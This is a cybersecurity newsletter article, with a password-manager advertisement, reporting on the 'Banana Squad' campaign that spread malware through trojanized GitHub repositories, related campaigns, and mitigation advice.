- Cyber Syrup
- Posts
- Trojanized GitHub Repositories Used to Spread Malware in New Campaign
Trojanized GitHub Repositories Used to Spread Malware in New Campaign
Cybersecurity researchers have uncovered a new malware distribution campaign leveraging GitHub repositories to spread trojanized hacking tools
In partnership with
CYBER SYRUP
Delivering the sweetest insights on cybersecurity.
Organizations that need security choose Proton Pass
Proton Pass Business is the secure, streamlined way to manage team credentials. Trusted by over 50,000 businesses worldwide, Pass was developed by the creators of Proton Mail and SimpleLogin and featured in TechCrunch and The Verge.
From startups to nonprofits, teams rely on Proton Pass to:
Share passwords safely with end-to-end encryption
Manage access with admin controls and activity logs
Enforce strong password policies with built-in 2FA
Revoke access instantly during employee turnover
Simplify onboarding and offboarding across departments
Whether you're running IT for a global team or just want Daryl in accounting to stop using “password123,” Proton Pass helps you stay compliant, efficient, and secure — no training required.
Join the 50,000+ businesses who already trust Proton.
Trojanized GitHub Repositories Used to Spread Malware in New Campaign
Cybersecurity researchers have uncovered a new malware distribution campaign leveraging GitHub repositories to spread trojanized hacking tools. Dubbed "Banana Squad" by ReversingLabs, the operation builds on a 2023 campaign targeting the Python Package Index (PyPI), where malicious packages were downloaded over 75,000 times.
This campaign, however, shifts focus to GitHub. Researchers found over 67 repositories masquerading as popular Python-based hacking tools—such as account checkers or game cheats—delivering malware-laced payloads instead.
How the Campaign Works
These malicious repositories impersonate legitimate software like Discord account cleaners, TikTok username checkers, Fortnite cheats, and even cryptocurrency tools. Once downloaded, users unknowingly execute a multi-stage malware chain that includes:
Initial Python scripts that download additional payloads.
Injection of malicious code into applications like the Exodus crypto wallet.
Exfiltration of sensitive data to attacker-controlled servers such as
dieserbenni[.]ru.
All 67 repositories identified in this campaign have since been taken down by GitHub.
A Growing Trend: GitHub as a Malware Distribution Hub
This isn't an isolated case. GitHub is increasingly being abused by threat actors as a malware delivery vector.
Trend Micro recently uncovered 76 malicious repositories run by a group named Water Curse, spreading credential stealers and RATs.
Check Point exposed a criminal distribution network called the Stargazers Ghost Network, which uses GitHub stars and forks to give legitimacy to malware-laden repositories.
These fake repositories often mimic real open-source tools or game-related utilities, preying on unsuspecting users looking for free cheats or utilities.
Targeting Inexperienced Cybercriminals and Gamers
Sophos recently revealed a similar campaign that backdoored a repository for Sakura-RAT, tricking aspiring cybercriminals into compiling and installing info-stealing malware. These backdoors were hidden in:
Python scripts
Visual Studio PreBuild events
JavaScript files
Screensaver (.scr) executables
Over 133 such repositories have been identified to date, suggesting the presence of a Distribution-as-a-Service (DaaS) model operating since at least 2022.
Mitigation and Awareness
This growing abuse of GitHub underscores the need for:
Verifying the legitimacy of open-source tools before installation.
Avoiding unknown GitHub repositories shared via Discord, YouTube, or social media.
Scanning all scripts and executables with endpoint protection solutions.
As trojanized development tools and game cheats become more sophisticated, users must remain vigilant against seemingly benign tools that may contain dangerous backdoors.